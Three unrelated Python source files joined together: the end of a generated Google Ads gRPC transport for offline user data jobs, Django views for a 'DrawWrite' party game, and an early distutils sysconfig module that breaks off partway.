response_deserializer=offline_user_data_job_service.CreateOfflineUserDataJobResponse.deserialize,
)
return self._stubs["create_offline_user_data_job"]
@property
def get_offline_user_data_job(
self,
) -> Callable[
[offline_user_data_job_service.GetOfflineUserDataJobRequest],
offline_user_data_job.OfflineUserDataJob,
]:
r"""Return a callable for the get offline user data job method over gRPC.
Returns the offline user data job.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `HeaderError <>`__
`InternalError <>`__ `QuotaError <>`__ `RequestError <>`__
Returns:
Callable[[~.GetOfflineUserDataJobRequest],
~.OfflineUserDataJob]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "get_offline_user_data_job" not in self._stubs:
self._stubs[
"get_offline_user_data_job"
] = self.grpc_channel.unary_unary(
"/google.ads.googleads.v9.services.OfflineUserDataJobService/GetOfflineUserDataJob",
request_serializer=offline_user_data_job_service.GetOfflineUserDataJobRequest.serialize,
response_deserializer=offline_user_data_job.OfflineUserDataJob.deserialize,
)
return self._stubs["get_offline_user_data_job"]
@property
def add_offline_user_data_job_operations(
self,
) -> Callable[
[offline_user_data_job_service.AddOfflineUserDataJobOperationsRequest],
offline_user_data_job_service.AddOfflineUserDataJobOperationsResponse,
]:
r"""Return a callable for the add offline user data job
operations method over gRPC.
Adds operations to the offline user data job.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `DatabaseError <>`__ `FieldError <>`__
`HeaderError <>`__ `InternalError <>`__ `MutateError <>`__
`OfflineUserDataJobError <>`__ `QuotaError <>`__
`RequestError <>`__
Returns:
Callable[[~.AddOfflineUserDataJobOperationsRequest],
~.AddOfflineUserDataJobOperationsResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "add_offline_user_data_job_operations" not in self._stubs:
self._stubs[
"add_offline_user_data_job_operations"
] = self.grpc_channel.unary_unary(
"/google.ads.googleads.v9.services.OfflineUserDataJobService/AddOfflineUserDataJobOperations",
request_serializer=offline_user_data_job_service.AddOfflineUserDataJobOperationsRequest.serialize,
response_deserializer=offline_user_data_job_service.AddOfflineUserDataJobOperationsResponse.deserialize,
)
return self._stubs["add_offline_user_data_job_operations"]
@property
def run_offline_user_data_job(
self,
) -> Callable[
[offline_user_data_job_service.RunOfflineUserDataJobRequest],
operations_pb2.Operation,
]:
r"""Return a callable for the run offline user data job method over gRPC.
Runs the offline user data job.
When finished, the long running operation will contain the
processing result or failure information, if any.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `DatabaseError <>`__
`HeaderError <>`__ `InternalError <>`__
`OfflineUserDataJobError <>`__ `QuotaError <>`__
`RequestError <>`__
Returns:
Callable[[~.RunOfflineUserDataJobRequest],
~.Operation]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "run_offline_user_data_job" not in self._stubs:
self._stubs[
"run_offline_user_data_job"
] = self.grpc_channel.unary_unary(
"/google.ads.googleads.v9.services.OfflineUserDataJobService/RunOfflineUserDataJob",
request_serializer=offline_user_data_job_service.RunOfflineUserDataJobRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["run_offline_user_data_job"]
__all__ = ("OfflineUserDataJobServiceGrpcTransport",)
|
|
"""All the views for DrawWrite."""
# Imports {{{
import logging
from base64 import b64decode
from itertools import zip_longest
from django.core.files.base import ContentFile
from django.db import IntegrityError
from django.http import HttpResponseBadRequest, HttpResponseNotAllowed, JsonResponse
from django.shortcuts import redirect, render
from drawwrite.forms import CreateGameForm, JoinGameForm
from drawwrite.models import Chain, Game, DrawLink, Player, WriteLink
from . import services
from .bracefmt import BraceFormatter as __
# }}}
LOG = logging.getLogger(__name__)
# index {{{
def index(request):
"""
The front page of the app.
"""
LOG.debug("enter index")
# Create the two forms that we'll put on this page.
create_form = CreateGameForm()
join_form = JoinGameForm()
# TODO errors shouldn't get added by title and description, but by number.
# Then I should look up the title and description from that number.
return render(request, 'drawwrite/index.html', {
'create_form': create_form,
'join_form': join_form,
'error_title': request.session.pop('error_title', None),
'error_description': request.session.pop('error_description', None),
})
# }}}
# join_game {{{
def join_game(request):
"""
Proccess data that a user sends when they want to join a game.
"""
LOG.debug('enter')
# Send all non-POSTs to the index.
if request.method != 'POST':
LOG.info(__('attempted non-supported method {0}', request.method))
request.session['error_title'] = 'Unsupported method'
request.session['error_description'] = (
'You\'re not allowed to send {0} requests to that endpoint.'.format(request.method),
)
return redirect('drawwrite:index')
# Get the form from the POSTed data.
form = JoinGameForm(request.POST)
# Invalid forms redirect to the index with an error.
if not form.is_valid():
LOG.debug(__(
'name {0} or gamename {1} invalid',
form.data['username'],
form.data['gamename'],
))
request.session['error_title'] = 'Invalid input'
request.session['error_description'] = ' '.join((
'Your Name and the Game Name must only contain letters, numbers,',
'underscores, and hyphens.',
))
return redirect('drawwrite:index')
# Valid forms are processed.
gamename = form.cleaned_data['gamename']
username = form.cleaned_data['username']
# Get the game. On error, add error objects to the session and redirect
# to index.
# TODO extract this, possibly to services.py
games = Game.objects.filter( #pylint: disable=no-member
name=gamename,
).filter(
started=False,
)
if len(games) > 1:
LOG.error(__('somehow, two games with name {0} are being created', gamename))
request.session['error_title'] = 'Non-unique game name'
request.session['error_description'] = 'Could not find a unique game for you to join'
return redirect('drawwrite:index')
if len(games) < 1:
LOG.error(__('tried to join non-existant game {0}', gamename))
request.session['error_title'] = 'Non-existent game'
request.session['error_description'] = ' '.join((
'The game that you attempted to join, {0},'.format(gamename),
'does not exist. Please check that you entered it correctly.',
))
return redirect('drawwrite:index')
game = games[0]
LOG.debug(__('got game for player {0}', username))
# Add a player to the game. On error, add error objects to the session and
# redirect to index.
player = None
try:
player = services.new_player(game, username, False)
except services.GameAlreadyStarted:
LOG.debug(__('could not add {0} to game {1}', username, game.name))
request.session['error_title'] = 'Game started'
request.session['error_description'] = ' '.join((
'The game that you attempted to join has already started. Please',
'either join a different game or start your own game.',
))
return redirect('drawwrite:index')
# TODO don't assume that all IntegrityError's mean that the game name is
# already taken. There are plenty of other explanations that I'm
# silencing by doing this.
except IntegrityError:
LOG.exception(__(
'player with {0} already exists in game {1}',
username,
gamename,
))
request.session['error_title'] = 'Player exists'
request.session['error_description'] = ' '.join((
'The player name that you entered is already in use in the game',
'that you are trying to join. Please choose a new player name',
'and try again.',
))
return redirect('drawwrite:index')
# Redirect to that game's page.
LOG.debug('exiting join game view')
return redirect('drawwrite:play', player.pk)
# }}}
# create_game {{{
def create_game(request):
"""
Create a game according to the values the user specified in the form.
"""
LOG.debug('entering create game view')
# Send all non-POSTs to the index.
if request.method != 'POST':
LOG.debug(__('attempted non-supported method {0}', request.method))
return redirect('drawwrite:index')
# Get the form from the POSTed data.
form = CreateGameForm(request.POST)
# Invalid forms redirect to the index with an error.
if not form.is_valid():
#LOG.debug(__(
# 'username {0} or gamename {1} invalid',
# form.data['username'],
# form.data['gamename'],
#))
LOG.debug(__(
'form error: {0}',
form.errors,
))
request.session['error_title'] = 'Invalid input'
request.session['error_description'] = ' '.join((
'Your Name and the Game Name must only contain letters, numbers,',
'underscores, and hyphens.',
))
return redirect('drawwrite:index')
# Valid forms are processed.
gamename = form.cleaned_data['gamename']
username = form.cleaned_data['username']
# Create game. On error, add error objects to the session and redirect
# to index.
# TODO handle other errors that could happen?
game = services.new_game(gamename)
if game is None:
request.session['error_title'] = 'Game being created'
request.session['error_description'] = (
'The game you are trying to join, {0}, is already being created'
).format(gamename)
# Create a player for that game. On error, add error objects to the
# session and redirect to index.
player = None
try:
player = services.new_player(game, username, True)
# TODO don't assume that all IntegrityError's mean that the user name is
# already taken. There are plenty of other explanations that I'm
# silencing by doing this.
except services.NameTaken as exception:
LOG.error('player name already taken')
request.session['error_title'] = 'Player name taken'
request.session['error_description'] = exception.message()
return redirect('drawwrite:index')
except IntegrityError:
LOG.error(__('a new game has an invalid player {0}', username))
request.session['error_title'] = 'Player name taken'
request.session['error_description'] = ' '.join((
'The player name that you entered, {0},'.format(username),
' is already taken for the game that you entered. Please',
'try a different one.',
))
return redirect('drawwrite:index')
# Redirect to that game's page.
LOG.debug('exiting create game view')
return redirect('drawwrite:play', player.pk)
# }}}
# play {{{
def play(request, player_id):
"""
The page on which players play the game.
"""
LOG.debug('enter play view')
# Get their player from the database using the id in the path. On error,
# set error session attributes and redirect to index.
player = None
try:
player = Player.objects.get(pk=player_id) #pylint: disable=no-member
except Player.DoesNotExist: #pylint: disable=no-member
LOG.error(__('non-existant player attempt: {0}', player_id))
request.session['error_title'] = 'Player Does Not Exist'
request.session['error_description'] = ' '.join((
'You attempted to access a non-existant player. Plase do not',
'do that.',
))
return redirect('drawwrite:index')
LOG.debug(__('successfully retreived player {0}', player_id))
# Get the game from the player object.
game = player.game
LOG.debug(__('successfully retreived game for player {0}', player_id))
# If the game hasn't started, show the player the waiting screen.
if not game.started:
LOG.debug(__('game for player {0} has not started', player_id))
# Get a list of all players in this game.
all_players = Player.objects.filter(game=game) #pylint: disable=no-member
LOG.debug(__('got players in game with player {0}', player_id))
# Get the creator of the game.
creator = None
for player in all_players:
if player.was_creator:
creator = player
LOG.debug(__('creator of game is {0}', creator.name))
# Render the waiting screen with all of those players.
LOG.debug(__('showing player {0} the waiting screen', player_id))
return render(request, 'drawwrite/waiting.html', {
'all_players' : all_players,
'player_id' : player_id,
'created' : player.was_creator,
'creator' : creator,
})
LOG.debug(__('game for player {0} has started', player_id))
# The game has started. Check if it's also finished.
if game.round_num >= game.num_players:
LOG.debug('game finished, redirect to view page')
return redirect('drawwrite:showGame', game.pk)
# The game has started, so decide whether to show the waiting page.
if player.current_round == game.round_num + 1:
# If the player's round equals the number of players in the game,
# show the 'wait for game completion' game.
if player.current_round == player.game.num_players:
LOG.debug('show game finished waiting page')
return render(request, 'drawwrite/gameWaiting.html', {
'game_id' : game.pk,
})
# If the game isn't finished, show the waiting page for the next round.
LOG.debug('show waiting page, this user is done with current round')
return render(request, 'drawwrite/roundWaiting.html', {
'player_id' : player_id,
})
# If the player's round doesn't equal the game's round, something is fishy.
elif not player.current_round == game.round_num:
LOG.error(__(
'player {0} has round {1}, while game {2} has round {3}',
player_id,
player.current_round,
game.pk,
game.round_num,
))
# TODO come up with a better thing to show the user in this case
return HttpResponseBadRequest()
# Figure out which position's chain this player should have access to next.
chain_pos_to_get = (player.position + game.round_num) % game.num_players
LOG.debug(__('player {0} needs position {1}s chain', player_id, chain_pos_to_get))
# Get the owner of the chain that player will edit.
chain_owner = None
try:
chain_owner = Player.objects.filter( #pylint: disable=no-member
game=game,
).get(
position=chain_pos_to_get,
)
except Player.DoesNotExist: #pylint: disable=no-member
LOG.error(__(
'player with game {0} and pos {1} does not exist',
game.pk,
chain_pos_to_get,
))
request.session['error_title'] = 'Player Does Not Exist'
request.session['error_description'] = ' '.join((
'You tried to get a player that does not exist. Sorry for',
'the inconvenience.',
))
return redirect('drawwrite:index')
LOG.debug(__('got chain_owner ({0}) for player {1}', chain_owner.pk, player_id))
# Get the chain for the player.
chain = None
try:
chain = Chain.objects.get(player=chain_owner) #pylint: disable=no-member
except Chain.DoesNotExist: #pylint: disable=no-member
# Make a chain for this player.
chain = services.new_chain(player)
LOG.debug(__('got chain for user {0}', player_id))
# If the chain has no links, show the player a screen to enter their first
# text link.
if chain.next_link_position == 0:
LOG.debug(__('returning page for first link for user {0}', player_id))
return render(request, 'drawwrite/chainAdd.html', {
'prev_link_type': '',
'prev_link': None,
'player_id': player_id,
})
# Figure out what type of link the player needs to make.
prev_link_pos = chain.next_link_position - 1
prev_link = None
prev_link_type = ''
if prev_link_pos % 2 == 0:
prev_link_type = 'write'
prev_link = WriteLink.objects.get( #pylint: disable=no-member
chain=chain,
link_position=prev_link_pos
)
else:
prev_link_type = 'draw'
prev_link = DrawLink.objects.get( #pylint: disable=no-member
chain=chain,
link_position=prev_link_pos
)
# Show the player a page to add the next link type.
LOG.debug('exit add to chain view')
return render(request, 'drawwrite/chainAdd.html', {
'prev_link_type': prev_link_type,
'prev_link': prev_link,
'player_id': player_id,
})
# }}}
# check_game_start {{{
def check_game_start(request, player_id): #pylint: disable=unused-argument
"""Check if the passed player's game has started."""
LOG.debug(__('checking game status for player {0}', player_id))
# Get the player.
player = None
try:
player = Player.objects.get(pk=player_id) #pylint: disable=no-member
except Player.DoesNotExist: #pylint: disable=no-member
LOG.error(__('non-existant player: {0}', player_id))
return HttpResponseBadRequest()
LOG.debug(__('successfully found player {0}', player_id))
# If the player's game has not started, return an updated list of names.
if not player.game.started:
LOG.debug(__('player {0} game has not started', player_id))
# Get all the players in the game.
all_players = Player.objects.filter(game=player.game) #pylint: disable=no-member
LOG.debug(__('got all players in game with {0}', player_id))
# Create a list of all player names.
names = []
for player in all_players:
names.append(player.name)
LOG.debug('made list of all player names')
# Return the data we need.
return JsonResponse({'started': False, 'names': names})
# If the player's game has started, return an object indicating as much.
return JsonResponse({'started': True, 'names': []})
# }}}
# start_game {{{
def start_game(request, player_id):
"""Start the game of the player identified by player_id"""
LOG.debug(__('starting game of player {0}', player_id))
# Make sure method is POST.
if not request.method == 'POST':
LOG.error('attempted to GET to start game')
return HttpResponseBadRequest()
# Get the player.
player = None
try:
player = Player.objects.get(pk=player_id) #pylint: disable=no-member
except Player.DoesNotExist: #pylint: disable=no-member
LOG.error(__('non-existant player {0}', player_id))
return HttpResponseBadRequest()
LOG.debug(__('successfully got player {0}', player_id))
# Set the player's game to 'started'.
services.start_game(player.game)
LOG.debug('set players game to started')
# Redirect to 'play'.
LOG.debug('redirecting to play')
return redirect('drawwrite:play', player_id)
# }}}
# create_link {{{
def create_link(request, player_id):
"""
Accept POST data and create a new link in the chain that player_id should
be adding to.
"""
LOG.debug(__('creating link for player {0}', player_id))
# Only accept POSTs
if not request.method == 'POST':
LOG.error('should have POSTed data')
return HttpResponseNotAllowed(['POST'])
LOG.debug(__('got POST data for player {0}', player_id))
# Get the player.
player = None
try:
player = Player.objects.get(pk=player_id) #pylint: disable=no-member
except Player.DoesNotExist: #pylint: disable=no-member
LOG.error(__('non-existant player {0}', player_id))
request.session['error_title'] = 'Player Does Not Exist'
request.session['error_description'] = ' '.join((
'The player that you tried to create a link for does not exist.',
'We apologize for the inconvenience.',
))
return redirect('drawwrite:index')
LOG.debug(__('got the player with pk {0}', player_id))
# Calculate the position of the player that this player_id is adding to.
chain_owner_pos = (player.position + player.game.round_num) % player.game.num_players
LOG.debug(__('player {0} needs chain of player {1}', player_id, chain_owner_pos))
# Get the owner of the chain this player is adding to.
try:
chain_owner = Player.objects.filter( #pylint: disable=no-member
game=player.game,
).get(
position=chain_owner_pos,
)
except Player.DoesNotExist: #pylint: disable=no-member
LOG.error(__(
'player with game {0} and position {1} does not exist',
player.game.pk,
chain_owner_pos,
))
request.session['error_title'] = 'Player Does Not Exist'
request.session['description'] = ' '.join((
'You attempted to access a player that does not exist. We are',
'sorry for the inconvenience.',
))
return redirect('drawwrite:index')
LOG.debug(__('successfully got chain owner for player {0}', player_id))
# Get the player's chain.
chain = None
try:
chain = Chain.objects.get(player=chain_owner) #pylint: disable=no-member
except Chain.DoesNotExist: #pylint: disable=no-member
LOG.error(__('player {0} should have a chain but does not', player_id))
request.session['error_title'] = 'Player Has No Chain'
request.session['error_description'] = ' '.join((
'The player that you tried to create a link for does not have',
'a chain, but that should not be possible. We apologize for',
'the inconvenience.',
))
return redirect('drawwrite:index')
LOG.debug(__('got the chain for player with pk {0}', player_id))
# Figure out what type of link to make.
if chain.next_link_position % 2 == 0:
# The POST data needs to have the 'description' field or something
# is wrong.
if 'description' not in request.POST.keys():
LOG.error(' '.join((
'should be making write link, but did not receive any',
'writing in the POSTed data',
)))
return HttpResponseBadRequest()
LOG.debug(__('making new write link for player {0}', player_id))
# Make the new write link.
services.new_write_link(chain, request.POST.get('description'), player)
else:
# The POST data needs to have the 'drawing' field or something
# is wrong.
if 'drawing' not in request.POST.keys():
LOG.error(' '.join((
'should be making a draw link, but did not receive any',
'drawing data in the POSTed data',
)))
return HttpResponseBadRequest()
LOG.debug('got image data to save')
# Make sure the data starts with 'data:image/png;base64,'
data_string = request.POST.get('drawing')
if not data_string.startswith('data:image/png;base64,'):
LOG.error(__('got bad image data: started with {0}', data_string[0:15]))
return HttpResponseBadRequest()
LOG.debug('got good(ish) image data')
# Shave off the stuff from above.
data_string = data_string.split(';base64,')[1]
LOG.debug('split off the ;base64, stuff')
# Decode the base64 data.
binary_data = b64decode(data_string)
LOG.debug('decoded base64 data')
# Make a file-like object out of the data.
file_name = "link-{0}-{1}.png".format(player_id, chain.next_link_position)
file_obj = ContentFile(binary_data, name=file_name)
LOG.debug(__('made file with name {0}', file_name))
# Make the draw link.
services.new_draw_link(chain, file_obj, player)
LOG.debug(__('created draw link, file has name {0}', file_name))
# Increase the 'num_players_finished_current_round' of this game.
services.player_finished(player)
# Redirect to 'play'.
return redirect('drawwrite:play', player_id)
# }}}
# check_round_done {{{
def check_round_done(request, player_id):
"""
Check if the round of the current game is completed. Return a javascript
object that has a list of every player's name that has not completed the round.
"""
LOG.debug(__('checking if round is completed for player {0}', player_id))
# Get the player.
player = None
try:
player = Player.objects.get(pk=player_id) #pylint: disable=no-member
except Player.DoesNotExist: #pylint: disable=no-member
LOG.error('attempted to get player that does not exist')
request.session['error_title'] = 'Player Does Not Exist'
request.session['error_description'] = ' '.join((
'The player that you attempted to get does not exist. We are',
'sorry for the inconvenience.',
))
return redirect('drawwrite:index')
LOG.debug(__('successfully got player {0}', player_id))
# Check if the game round equals the player's round. If so, then the
# player is allowed to move on. Otherwise, they're not.
if player.game.round_num == player.current_round:
LOG.debug('round is completed')
# Return an object saying that the round is done.
return JsonResponse({'finished': True})
LOG.debug('round is not completed')
# Get all players in the game who have not completed the
# current round.
try:
players_still_playing = Player.objects.filter( #pylint: disable=no-member
game=player.game,
).filter(
current_round__lt=player.current_round,
)
except BaseException as exception:
LOG.error(exception)
raise
LOG.debug('got list of players still playing')
# Turn the players into a list of names.
names_still_playing = []
for player in players_still_playing:
names_still_playing.append(player.name)
LOG.debug('got list of names of players still playing')
# Return an object saying that the round is not done.
return JsonResponse({
'finished': False,
'still_playing': names_still_playing,
})
# }}}
# check_game_done {{{
def check_game_done(request, game_id): #pylint: disable=unused-argument
"""Check if the game with the passed game_id is finished."""
LOG.debug(__('checking if game {0} is done', game_id))
# Get the game.
game = None
try:
game = Game.objects.get(pk=game_id) #pylint: disable=no-member
except Game.DoesNotExist: #pylint: disable=no-member
LOG.error(__('tried to get non-existant game {0}', game_id))
# TODO better error stuff
return HttpResponseBadRequest
LOG.debug(__('got game {0}', game_id))
# Check if the round equals the number of players.
if game.round_num == game.num_players:
return JsonResponse({'finished': True})
# Get a list of players whose current round equals the game's round.
try:
players_still_playing = Player.objects.filter( #pylint: disable=no-member
game=game,
).filter(
current_round=game.round_num,
)
except BaseException as exception:
LOG.error(exception)
raise
LOG.debug('got list of players still playing')
# Turn that list of players into a list of names.
names_still_playing = []
for player in players_still_playing:
names_still_playing.append(player.name)
LOG.debug('created list of names of players still playing')
# Return an object saying that the round is not done.
return JsonResponse({
'finished': False,
'still_playing': names_still_playing,
})
# }}}
# show_game {{{
def show_game(request, game_id):
"""Show a completed game."""
LOG.debug(__('showing game {0}', game_id))
# Get the game.
game = None
try:
game = Game.objects.get(pk=game_id) #pylint: disable=no-member
except Game.DoesNotExist: #pylint: disable=no-member
LOG.error(__('tried to get non-existant game {0}', game_id))
# TODO better error here
return HttpResponseBadRequest()
LOG.debug(__('got game {0}', game_id))
# Get all players associated with that game.
players = Player.objects.filter(game=game) #pylint: disable=no-member
# Render the game view page.
# Change gameName to game_name
return render(request, 'drawwrite/game.html', {
'players': players,
'game_name': game.name,
})
# }}}
# show_chain {{{
def show_chain(request, player_id):
"""Show a completed chain."""
LOG.debug(__('showing chain of player {0}', player_id))
# Get the player.
player = None
try:
player = Player.objects.get(pk=player_id) #pylint: disable=no-member
except Player.DoesNotExist: #pylint: disable=no-member
LOG.error(__('tried to get non-existant player {0}', player_id))
# TODO better error messege
return HttpResponseBadRequest()
LOG.debug(__('got player {0}', player_id))
# Get the chain.
chain = None
try:
chain = Chain.objects.get(player=player) #pylint: disable=no-member
except Chain.DoesNotExist: #pylint: disable=no-member
LOG.error(__('tried to get non-existant chain for player {0}', player_id))
# TODO better error message
return HttpResponseBadRequest()
LOG.debug(__('got chain for player {0}', player_id))
# Get all the write links and all the draw links.
write_links = WriteLink.objects.filter(chain=chain) #pylint: disable=no-member
draw_links = DrawLink.objects.filter(chain=chain) #pylint: disable=no-member
# Make a list of all the links in the chain.
links = []
for write, draw in zip_longest(write_links, draw_links):
if write is not None:
links.append(write)
if draw is not None:
links.append(draw)
LOG.debug(__('made list of all links for player {0}', player_id))
# Render the chain view.
return render(request, 'drawwrite/chain.html', {
'links': links,
'player': player,
})
# }}}
# get_available_games {{{
def get_available_games(request):
"""Return a list of game names that may be joined."""
being_created = Game.objects.filter(started=False) #pylint: disable=no-member
options = []
for game in being_created:
options.append(game.name)
LOG.debug('returning list of available games')
return JsonResponse({'options': options})
# }}}
|
|
"""Provide access to Python's configuration information. The specific names
defined in the module depend heavily on the platform and configuration.
Written by: Fred L. Drake, Jr.
Email: <fdrake@acm.org>
Initial date: 17-Dec-1998
"""
__revision__ = "$Id: sysconfig.py,v 1.34 2001/02/28 19:40:27 akuchling Exp $"
import os
import re
import string
import sys
from errors import DistutilsPlatformError
# These are needed in a couple of spots, so just compute them once.
PREFIX = os.path.normpath(sys.prefix)
EXEC_PREFIX = os.path.normpath(sys.exec_prefix)
# Boolean; if it's true, we're still building Python, so
# we use different (hard-wired) directories.
python_build = 0
def set_python_build():
"""Set the python_build flag to true; this means that we're
building Python itself. Only called from the setup.py script
shipped with Python.
"""
global python_build
python_build = 1
def get_python_inc(plat_specific=0, prefix=None):
"""Return the directory containing installed Python header files.
If 'plat_specific' is false (the default), this is the path to the
non-platform-specific header files, i.e. Python.h and so on;
otherwise, this is the path to platform-specific header files
(namely config.h).
If 'prefix' is supplied, use it instead of sys.prefix or
sys.exec_prefix -- i.e., ignore 'plat_specific'.
"""
if prefix is None:
prefix = (plat_specific and EXEC_PREFIX or PREFIX)
if os.name == "posix":
if python_build:
return "Include/"
return os.path.join(prefix, "include", "python" + sys.version[:3])
elif os.name == "nt":
return os.path.join(prefix, "Include") # include or Include?
elif os.name == "mac":
return os.path.join(prefix, "Include")
else:
raise DistutilsPlatformError, \
("I don't know where Python installs its C header files " +
"on platform '%s'") % os.name
def get_python_lib(plat_specific=0, standard_lib=0, prefix=None):
"""Return the directory containing the Python library (standard or
site additions).
If 'plat_specific' is true, return the directory containing
platform-specific modules, i.e. any module from a non-pure-Python
module distribution; otherwise, return the platform-shared library
directory. If 'standard_lib' is true, return the directory
containing standard Python library modules; otherwise, return the
directory for site-specific modules.
If 'prefix' is supplied, use it instead of sys.prefix or
sys.exec_prefix -- i.e., ignore 'plat_specific'.
"""
if prefix is None:
prefix = (plat_specific and EXEC_PREFIX or PREFIX)
if os.name == "posix":
libpython = os.path.join(prefix,
"lib", "python" + sys.version[:3])
if standard_lib:
return libpython
else:
return os.path.join(libpython, "site-packages")
elif os.name == "nt":
if standard_lib:
return os.path.join(PREFIX, "Lib")
else:
return prefix
elif os.name == "mac":
if plat_specific:
if standard_lib:
return os.path.join(EXEC_PREFIX, "Mac", "Plugins")
else:
raise DistutilsPlatformError, \
"OK, where DO site-specific extensions go on the Mac?"
else:
if standard_lib:
return os.path.join(PREFIX, "Lib")
else:
raise DistutilsPlatformError, \
"OK, where DO site-specific modules go on the Mac?"
else:
raise DistutilsPlatformError, \
("I don't know where Python installs its library " +
"on platform '%s'") % os.name
# get_python_lib()
def customize_compiler (compiler):
"""Do any platform-specific customization of the CCompiler instance
'compiler'. Mainly needed on Unix, so we can plug in the information
that varies across Unices and is stored in Python's Makefile.
"""
if compiler.compiler_type == "unix":
(cc, opt, ccshared, ldshared, so_ext) = \
get_config_vars('CC', 'OPT', 'CCSHARED', 'LDSHARED', 'SO')
cc_cmd = cc + ' ' + opt
compiler.set_executables(
preprocessor=cc + " -E", # not always!
compiler=cc_cmd,
compiler_so=cc_cmd + ' ' + ccshared,
linker_so=ldshared,
linker_exe=cc)
compiler.shared_lib_extension = so_ext
def get_config_h_filename():
"""Return full pathname of installed config.h file."""
if python_build: inc_dir = '.'
else: inc_dir = get_python_inc(plat_specific=1)
return os.path.join(inc_dir, "config.h")
def get_makefile_filename():
"""Return full pathname of installed Makefile from the Python build."""
if python_build:
return './Makefile'
lib_dir = get_python_lib(plat_specific=1, standard_lib=1)
return os.path.join(lib_dir, "config", "Makefile")
def parse_config_h(fp, g=None):
"""Parse a config.h-style file.
A dictionary containing name/value pairs is returned. If an
optional dictionary is passed in as the second argument, it is
used instead of a new dictionary.
"""
if g is None:
g = {}
define_rx = re.compile("#define ([A-Z][A-Z0-9_]+) (.*)\n")
undef_rx = re.compile("/[*] #undef ([A-Z][A-Z0-9_]+) [*]/\n")
#
while 1:
line = fp.readline()
if not line:
break
m = define_rx.match(line)
if m:
n, v = m.group(1, 2)
try: v = string.atoi(v)
except ValueError: pass
g[n] = v
else:
m = undef_rx.match(line)
if m:
g[m.group(1)] = 0
return g
# Regexes needed for parsing Makefile (and similar syntaxes,
# like old-style Setup files).
_variable_rx = re.compile("([a-zA-Z][a-zA-Z0-9_]+)\s*=\s*(.*)")
_findvar1_rx = re.compile(r"\$\(([A-Za-z][A-Za-z0-9_]*)\)")
_findvar2_rx = re.compile(r"\${([A-Za-z][A-Za-z0-9_]*)}")
def parse_makefile(fn, g=None):
"""Parse a Makefile-style file.
A dictionary containing name/value pairs is returned. If an
optional dictionary is passed in as the second argument, it is
used instead of a new dictionary.
"""
from distutils.text_file import TextFile
fp = TextFile(fn, strip_comments=1, skip_blanks=1, join_lines=1)
if g is None:
g = {}
done = {}
notdone = {}
while 1:
line = fp.readline()
if line is None: # eof
break
m = _variable_rx.match(line)
if m:
n, v = m.group(1, 2)
v = string.strip(v)
if "$" in v:
notdone[n] = v
else:
try: v = string.atoi(v)
except ValueError: pass
done[n] = v
# do variable interpolation here
while notdone:
for name in notdone.keys():
value = notdone[name]
m = _findvar1_rx.search(value) or _findvar2_rx.search(value)
if m:
n = m.group(1)
if done.has_key(n):
after = value[m.end():]
value = value[:m.start()] + str(done[n]) + after
if "$" in after:
notdone[name] = value
else:
try: value = string.atoi(value)
except ValueError:
done[name] = string.strip(value)
else:
done[name] = value
del notdone[name]
elif notdone.has_key(n):
# get it on a subsequent round
pass
else:
done[n] = ""
after = value[m.end():]
value = value[:m.start()] + after
if "$" in after:
notdone[name] = value
else:
try: value = string.atoi(value)
except ValueError:
done[name] = string.strip(value)
else:
done[name] = value
del notdone[name]
else:
# bogus variable reference; just drop it since we can't deal
del notdone[name]
fp.close()
# save the results in the global dictionary
g.update(done)
return g
def expand_makefile_vars(s, vars):
"""Expand Makefile-style variables -- "${foo}" or "$(foo)" -- in
'string' according to 'vars' (a dictionary mapping variable names to
values). Variables not present in 'vars' are silently expanded to the
empty string. The variable values in 'vars' should not contain further
variable expansions; if 'vars' is the output of 'parse_makefile()',
you're fine. Returns a variable-expanded version of 's'.
"""
# This algorithm does multiple expansion, so if vars['foo'] contains
# "${bar}", it will expand ${foo} to ${bar}, and then expand
# ${bar}... and so forth. This is fine as long as 'vars' comes from
# 'parse_makefile()', which takes care of such expansions eagerly,
# according to make's variable expansion semantics.
while 1:
m = _findvar1_rx.search(s) or _findvar2_rx.search(s)
if m:
name = m.group(1)
(beg, end) = m.span()
s = s[0:beg] + vars.get(m.group(1)) + s[end:]
else:
break
return s
_config_vars = None
def _init_posix():
"""Initialize the module as appropriate for POSIX systems."""
g = {}
# load the installed Makefile:
try:
filename = get_makefile_filename()
parse_makefile(filename, g)
except IOError, msg:
my_msg = "invalid Python installation: unable to open %s" % filename
if hasattr(msg, "strerror"):
my_msg = my_msg + " (%s)" % msg.strerror
raise DistutilsPlatformError, my_msg
# On AIX, there are wrong paths to the linker scripts in the Makefile
# -- these paths are relative to the Python source, but when installed
# the scripts are in another directory.
if python_build:
g['LDSHARED'] = g['BLDSHARED']
global _config_vars
_config_vars = g
def _init_nt():
"""Initialize the module as appropriate for NT"""
g = {}
# set basic install directories
g['LIBDEST'] = get_python_lib(plat_specific=0, standard_lib=1)
g['BINLIBDEST'] = get_python_lib(plat_specific=1, standard_lib=1)
# XXX hmmm.. a normal install puts include files here
g['INCLUDEPY'] = get_python_inc(plat_specific=0)
g['SO'] = '.pyd'
g['EXE'] = ".exe"
global _config_vars
_config_vars = g
def _init_mac():
"""Initialize the module as appropriate for Macintosh systems"""
g = {}
# set basic install directories
g['LIBDEST'] = get_python_lib(plat_specific=0, standard_lib=1)
g['BINLIBDEST'] = get_python_lib(plat_specific=1, standard_lib=1)
# XXX hmmm.. a normal install puts include files here
g['INCLUDEPY'] = get_python_inc(plat_specific=0)
g['SO'] = '.ppc.slb'
# XXX are these used anywhere?
g['install_lib'] = os.path.join(EXEC_PREFIX, "Lib")
g['install_platlib'] = os.path.join(EXEC_PREFIX, "Mac", "Lib")
global _config_vars
_config_vars = g
def get_config_vars(*args):
"""With no arguments, return a dictionary of all configuration
variables relevant for the current platform. Generally this includes
everything needed to build extensions and install both pure modules and
extensions. On Unix, this means every variable defined in Python's
installed Makefile; on Windows and Mac OS it's a much smaller set.
With arguments, return a list of values that result from looking up
each argument in the configuration variable dictionary.
"""
